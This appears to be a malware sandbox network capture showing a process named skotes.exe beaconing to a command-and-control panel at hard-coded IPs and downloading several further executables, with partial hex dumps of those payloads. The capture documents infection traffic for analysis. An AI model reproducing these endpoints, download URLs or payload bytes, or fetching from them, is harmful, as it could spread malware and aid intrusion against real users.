Dec 9, 2024 08:08:05.464078903 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49764	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:07.100564003 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 9, 2024 08:08:08.466139078 CET	668	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 64 64 0d 0a 20 3c 63 3e 31 30 31 33 33 36 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 65 32 65 63 31 31 30 31 61 65 36 30 32 62 32 31 61 31 64 30 33 30 31 61 32 66 64 63 35 33 31 62 61 61 66 39 61 35 35 33 36 65 36 23 31 30 31 33 33 37 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 33 37 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 33 33 37 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 1dd <c>1013367001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e2ec1101ae602b21a1d0301a2fdc531baaf9a5536e6#1013372001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013373001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013374001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013375001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49766	31.41.244.11	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:08.590676069 CET	66	OUT	GET /files/5131681669/4ZAAIhb.exe HTTP/1.1 Host: 31.41.244.11
Dec 9, 2024 08:08:09.913059950 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:09 GMT Content-Type: application/octet-stream Content-Length: 124416 Last-Modified: Mon, 09 Dec 2024 06:55:13 GMT Connection: keep-alive ETag: "67569451-1e600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 dc 6d 73 5a 00 00 00 00 00 00 00 00 f0 00 2f 00 0b 02 02 32 00 60 01 00 00 82 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 f1 01 00 c8 00 00 00 00 20 02 00 80 0c 00 00 00 d0 01 00 c8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdmsZ/2`@0 H.codeZ\ `.textp` `.rdata-KLd@@.pdata@@.data#@.rsrc @@
Dec 9, 2024 08:08:09.913075924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 49 c7 c0 60 01 00 00 48 31 d2 48 b9 44 04 02 40 01 00 00 00 e8 e3 5f Data Ascii: H(I`H1HD@_H1_H M1HH1_HH@H>=`H*@H-H`_HH
Dec 9, 2024 08:08:09.913089037 CET	1236	IN	Data Raw: 49 c1 e6 02 49 63 04 2e 49 01 c7 49 81 e7 ff 00 00 00 4c 89 f8 50 58 89 44 24 68 4c 63 7c 24 60 48 8b 6c 24 40 49 c1 e7 02 49 63 04 2f 50 58 89 84 24 80 00 00 00 4c 63 7c 24 68 49 c1 e7 02 49 63 04 2f 50 4c 63 7c 24 68 49 c1 e7 02 58 41 89 04 2f Data Ascii: IIc.IILPXD$hLc\|$`Hl$@IIc/PX$Lc\|$hIIc/PLc\|$hIXA/Hc$PLc\|$pIXA/D$`XD$`D$hHc$PXH$D$xLc$IL;D$xLc\|$`IILPXD$`Lc\|$hLct$`Hl$@IIc.IIL
Dec 9, 2024 08:08:09.913192034 CET	1236	IN	Data Raw: 08 01 00 48 83 c4 28 59 50 48 83 ec 08 51 48 83 ec 28 e8 38 08 01 00 48 83 c4 28 59 50 48 b8 2a f0 01 40 01 00 00 00 50 ff b4 24 80 00 00 00 ff 35 ce ea 01 00 59 5a 41 58 41 59 48 83 ec 20 e8 2b 5b 00 00 48 83 c4 28 48 8d 4c 24 50 5a e8 4c 08 01 Data Ascii: H(YPHQH(8H(YPH*@P$5YZAXAYH +[H(HL$PZLH.@Pt$PYZ\HD$hH\|$hQH(H(YPHQH(H(YPH.@Pht$pYZAXAYH ZH(HL$xZQH(uH(YPHQH(aH(Y
Dec 9, 2024 08:08:09.913204908 CET	896	IN	Data Raw: 01 00 48 83 c4 28 58 48 81 c4 88 00 00 00 41 5f 5d c3 41 57 48 c7 c0 07 00 00 00 48 83 ec 08 48 c7 04 24 00 00 00 00 48 ff c8 75 ef 48 83 ec 28 e8 66 05 01 00 48 b8 0b f1 01 40 01 00 00 00 48 89 05 09 e6 01 00 48 c7 44 24 28 00 00 00 00 eb 00 48 Data Ascii: H(XHA_]AWHHH$HuH(fH@HHD$(HH;D$(HHHD$0HQH(H(YPHQH(H(YPL\|$HMkLPYZH ]H(HL$@ZHL$@QH(H(YPH((H(HL$@H(
Dec 9, 2024 08:08:09.913216114 CET	1236	IN	Data Raw: ec 28 e8 94 01 01 00 48 83 c4 28 48 8b 4c 24 48 48 83 ec 28 e8 82 01 01 00 48 83 c4 28 58 48 83 c4 60 41 5f c3 55 41 57 48 31 c0 50 50 50 50 50 50 48 83 ec 28 e8 e1 01 01 00 51 48 83 ec 28 e8 b7 ff 00 00 48 83 c4 28 59 50 48 83 ec 08 68 02 00 00 Data Ascii: (H(HL$HH(H(XH`A_UAWH1PPPPPPH(QH(H(YPHhhQH(H(YPHQH(H(YPYH yH(P{HXH$YZAXH MH(YPH(GH(XHD$(hHHPt$8YZAXMt$(YM5YI
Dec 9, 2024 08:08:09.913229942 CET	1236	IN	Data Raw: fc 00 00 48 83 c4 28 48 8b 4c 24 50 48 83 ec 28 e8 b2 fc 00 00 48 83 c4 28 58 48 83 c4 58 41 5f 5d c3 48 89 4c 24 08 41 57 48 31 c0 50 50 50 48 83 ec 28 e8 0f fd 00 00 48 8b 4c 24 70 e8 7d 43 00 00 51 48 83 ec 28 e8 db fa 00 00 48 83 c4 28 59 50 Data Ascii: H(HL$PH(H(XHXA_]HL$AWH1PPPH(HL$p}CQH(H(YPHQH(H(YPYH H(HL$0Zt$(YnIL\|$PM!QH(H(YPQH vH YPH H(HL$8ZHL$(QH(IH(YPH(H(H
Dec 9, 2024 08:08:09.913244009 CET	1236	IN	Data Raw: 24 48 49 83 ff 0a 75 23 68 00 00 00 00 48 8d 05 2b 15 00 00 48 89 c0 50 ff 74 24 58 ff 74 24 58 59 5a 41 58 41 59 e8 b6 44 00 00 48 c7 c0 01 00 00 00 eb 03 48 31 c0 48 83 c4 30 41 5f c3 48 89 4c 24 08 41 57 48 31 c0 50 48 83 ec 28 4c 8b 7c 24 40 Data Ascii: $HIu#hH+HPt$Xt$XYZAXAYDHH1H0A_HL$AWH1PH(L\|$@ILPYH(L\|$@ILPYHL\|$@ILPYoHL\|$@ILPYUHL\|$@ILPY;HH1H0A_HL$AWH1PPPPPH(H
Dec 9, 2024 08:08:09.913517952 CET	1236	IN	Data Raw: f5 00 00 66 c7 00 00 00 50 48 8b 4c 24 38 48 83 ec 28 e8 08 f3 00 00 48 83 c4 28 48 8b 4c 24 40 48 83 ec 28 e8 f6 f2 00 00 48 83 c4 28 48 8b 4c 24 30 48 83 ec 28 e8 e4 f2 00 00 48 83 c4 28 48 8b 4c 24 48 48 83 ec 28 e8 d2 f2 00 00 48 83 c4 28 58 Data Ascii: fPHL$8H(H(HL$@H(H(HL$0H(H(HL$HH(H(XHPA_HL$HT$AWH1PPPPPH(HT$`HL$(H+HHT$hHL$0HHht$0hYZAXHD$8H\|$8tt$0t$@YZHD$@t$8Yt$0YKIM!u
Dec 9, 2024 08:08:09.913531065 CET	896	IN	Data Raw: 89 54 24 10 48 31 c0 50 50 48 83 ec 28 e8 b9 ee 00 00 ff 74 24 48 ff 74 24 48 59 5a e8 24 3b 00 00 48 89 44 24 28 ff 74 24 48 ff 74 24 48 59 5a e8 16 3b 00 00 48 89 05 1b cf 01 00 ff 35 15 cf 01 00 59 e8 83 94 00 00 48 89 44 24 30 ff 35 04 cf 01 Data Ascii: T$H1PPH(t$Ht$HYZ$;HD$(t$Ht$HYZ;H5YHD$05t$8t$8YZAXt$(Y:HD$0H1H8HL$UAWHHH$HuH(%H$HL$(HH[HD$HHD$PHD$HH;D$PQH(H(
Dec 9, 2024 08:08:10.032584906 CET	1236	IN	Data Raw: 92 00 00 48 89 44 24 38 ff 74 24 38 59 e8 39 91 00 00 48 89 84 24 88 00 00 00 48 8b 0d 16 cc 01 00 51 48 83 ec 28 e8 00 e9 00 00 48 83 c4 28 59 50 48 83 ec 28 e8 81 eb 00 00 48 83 c4 28 48 8b 0d 2a cc 01 00 48 83 ec 28 e8 6d eb 00 00 48 83 c4 28 Data Ascii: HD$8t$8Y9H$HQH(H(YPH(H(H*H(mH(L\|$XH-iMkLHMH(IH(H$ZH$t$@L$ILPHD$HHP$YZAXAYiH$t$8$$YZAX/L=Iu$L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49777	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:12.837831020 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 33 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013367001&unit=246122658369
Dec 9, 2024 08:08:14.178148031 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49783	185.215.113.16	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:14.343977928 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 9, 2024 08:08:15.691448927 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:15 GMT Content-Type: application/octet-stream Content-Length: 1856000 Last-Modified: Mon, 09 Dec 2024 06:21:14 GMT Connection: keep-alive ETag: "67568c5a-1c5200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 40 59 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUgpI@I@Y@\@p0A B@.rsrc0R@.idata @V@ @PX@izjfeliq/Z@vizxjewx`I@.taggant0pI"0@
Dec 9, 2024 08:08:15.691518068 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:15.692414045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:15.692457914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:15.692468882 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:15.694588900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:15.694610119 CET	1236	IN	Data Raw: 0d e3 39 56 6f 07 5c fd 8f 58 23 b6 c5 ec 63 9e c9 31 57 41 9b b8 b7 05 b2 4d 7c de f8 07 18 9e e0 c8 11 cc 5e 0c 87 20 c4 f8 8b b4 e8 29 87 60 fb 0f ce a0 be 4c 38 a4 39 80 28 5f bc 07 ca 10 8e 94 9d bc dd 97 cc 37 a5 26 72 dd c1 5c 40 a7 04 4e Data Ascii: 9Vo\X#c1WAM\|^ )`L89(_7&r\@N<KaR2\q7KMm[;+`]D2V\LH=7xh1#FQ!J*M@?Cxm,rdFR[8(E\|hrF^lX=YGf
Dec 9, 2024 08:08:15.694621086 CET	1236	IN	Data Raw: 18 cb 2c 9c 04 9f f2 ae d6 bf 9e 4f ad 6a 24 41 45 f2 ea a5 ec 6b ed 40 b0 94 ed d1 21 d8 0d 25 9a 72 4a 99 5a 7e ed dd d9 30 9e 61 91 b9 b0 0d 6d 47 ef b7 41 c9 2d b0 6e e8 51 55 bc ac 20 9f df c6 28 b2 30 c6 53 bc 16 6a 6f e8 29 9d 12 51 15 3f Data Ascii: ,Oj$AEk@!%rJZ~0amGA-nQU (0Sjo)Q?5l[z&)SZ?UD%t%1kG2$bD$feCvtKaP;%#)6#v\;S/9r!`(Pw~=Es{O[[Z)\|-~>COmzQUU<2
Dec 9, 2024 08:08:15.694745064 CET	1236	IN	Data Raw: 98 b3 01 10 c5 91 d0 5c 0f 4a 9d 67 91 82 94 b8 a8 da 58 64 a8 68 81 5b 16 a3 d5 bd 8e 68 6a 5e a0 1d 87 cf db 6f 48 3a ff fa 27 d0 7e e5 a3 42 c3 cb e0 c9 d0 ae 79 da ef 2b 1a 01 4c d3 e9 1d cd b3 ed 76 3f 5b 78 8d 87 b1 43 83 cf 11 2a d7 57 b3 Data Ascii: \JgXdh[hj^oH:'~By+Lv?[xCW%Y eApDPp)F,9uadaMCsj8HL2~.J\X#^Mq_RDbjAx_&&K}JwH{DT($mU24
Dec 9, 2024 08:08:15.694771051 CET	1236	IN	Data Raw: 83 6f dd 26 ad 60 98 61 dc cb b4 53 48 f2 e8 a4 17 d5 45 85 26 ea 92 cf e3 03 3b 8f 5d 0b c1 17 11 64 28 63 fb 4a 9f e6 af 7c 56 3c ce 09 4a 17 b9 7d 66 14 a5 42 4b 0c 24 f3 c5 f9 83 b3 04 df e5 08 e1 6c 85 e4 92 24 2d 58 83 9e c8 02 c7 10 f9 8d Data Ascii: o&`aSHE&;]d(cJ\|V<J}fBK$l$-Xr"`%@?ib?/`#HJ?P[8DT`!7cGK)AVxY, g0z,C=th8CH?S;sj,Wv`@l{?[
Dec 9, 2024 08:08:15.810885906 CET	1236	IN	Data Raw: 2e e2 63 d6 d2 98 35 fe ac b9 74 58 bd b9 32 d9 5e 1e a5 db 44 1e 58 bf da 68 e9 17 ef 38 67 85 28 46 3c 74 1a fb 10 2a e1 d7 ac 43 10 70 b6 94 6d bb 35 f1 ef 0a b2 98 9d c0 42 95 ab 70 38 55 bf 48 95 9d 6f 22 78 80 da cc 0a 44 26 eb d0 d4 5d 08 Data Ascii: .c5tX2^DXh8g(F<t*Cpm5Bp8UHo"xD&]Fen"@+=RnZ0&Zh~D9O@#S&I:5w[Z mz#09A(>[$F7vjG"X"#mD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49801	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:21.177233934 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 33 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013372001&unit=246122658369
Dec 9, 2024 08:08:22.514668941 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49807	185.215.113.16	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:22.637491941 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 9, 2024 08:08:23.977150917 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:23 GMT Content-Type: application/octet-stream Content-Length: 1784320 Last-Modified: Mon, 09 Dec 2024 06:21:21 GMT Connection: keep-alive ETag: "67568c61-1b3a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 a0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 68 00 00 04 00 00 48 a9 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(h@hH@M$a$$ $h@.rsrc$x@.idata $z@ 0*$\|@pjdaqopiN~@opjfflevh@.taggant0h"@
Dec 9, 2024 08:08:23.977204084 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:23.977216959 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:23.977299929 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:23.977313042 CET	1236	IN	Data Raw: 0c 3b 77 00 47 73 9b 5d 07 86 5a f4 fc be b7 3e ca 92 03 55 46 b6 bc 84 ee be 7b 23 ea 32 d4 4f b6 f4 cb 76 c6 2c e4 3e 01 88 b0 c2 27 dc b5 70 1e de b3 74 22 6e c3 30 fa be 0f 8e b4 cd 0b 9e 0a ba 17 8d e2 30 d4 74 0d a6 bf 0c f2 9e 03 76 c8 dd Data Ascii: ;wGs]Z>UF{#2Ov,>'pt"n00tvUeEcBv9u{/ LM@r$"?{s&_4TfO[FUMJ!>Ufxb"3mI=HpeCg;yVJMp)&]rq;V
Dec 9, 2024 08:08:23.977332115 CET	1120	IN	Data Raw: b8 d6 b5 b8 eb ee cf 5d 0b bd 80 11 6e a9 2e 05 18 96 37 ad bc de e8 85 95 cf 18 e9 bb ce 84 a5 59 54 02 b4 d2 4f 54 44 29 8b 1b f7 7e 87 03 41 f1 4b 03 d0 b3 a7 98 44 d5 13 fe 7e 1d bc a5 07 93 85 b6 d4 52 5f 02 24 1a 6d b5 ef fa 5e 03 02 3c af Data Ascii: ]n.7YTOTD)~AKD~R_$m^<N}OfqRNhh*I\|}1Aa;@ZfW;4)73/ck%XbI1K1]'HE</9y/>\a0He$2jew
Dec 9, 2024 08:08:23.977344036 CET	1236	IN	Data Raw: ba 7a 81 20 0c c7 4b 9e ba b1 e3 34 52 56 b6 2c d2 c0 31 dd 49 b8 e7 24 d6 cd 1a fd ba ee 83 bd 54 5c e9 94 ea c0 b9 e8 bb 02 80 5d 75 a4 85 bc bb fa 03 59 06 3b 67 00 bb b9 e3 b4 41 55 03 dd 4f 45 cd 40 3f ee 77 5e d2 c7 ab 44 b8 5d 77 84 d3 5e Data Ascii: z K4RV,1I$T\]uY;gAUOE@?w^D]w^{:4\tm<Ws>RP=6Rm:~eSytm+r~2uNq?5}ugPy\p^e#T=nw,ZeL>B,O=GtI
Dec 9, 2024 08:08:23.977360010 CET	1236	IN	Data Raw: 53 32 75 44 d1 83 bb 75 5a 32 1a f9 53 71 cb 20 e2 f6 9a 72 82 be 0f 41 4e 8c 77 dd 84 e6 ba 72 c6 9b ea 68 50 c4 b7 6e 2a 76 f3 67 53 92 ba 72 06 3b ea 6a 5b 49 0c 3f b8 7e ea 60 0c 9a f3 66 57 c6 80 21 65 56 03 78 22 37 64 7e 58 9e 21 ed 6b c2 Data Ascii: S2uDuZ2Sq rANwrhPn*vgSr;j[I?~`fW!eVx"7d~X!kmm"~/&l2\]c;)vYlcTym/`F REfsJq0kuf2pTpbBd&euI$\ftTzw,t>ltGor0/o
Dec 9, 2024 08:08:23.977533102 CET	1236	IN	Data Raw: 54 3d 05 86 2a 01 a4 dd b8 2a 04 65 6b 65 1a 35 93 06 9b 72 aa be a3 dc 0c bb ff cd f4 52 11 61 d4 cd 13 0e d2 e4 00 f1 c2 fa 19 58 17 ca 80 fe 4f 94 2f 87 a8 94 ab 54 b8 86 77 2c b2 8b 35 34 d5 4b 30 24 b8 74 c7 6d 7e 3b 1b cd ee 52 e7 fc b8 95 Data Ascii: T=**eke5rRaXO/Tw,54K0$tm~;Rkpr2`WwBI;u#=t,r:prR~Gy#Y6]f"Uvl24VrkU17jI\|>kNB>rRF2z7b%FKO2\|hxs`
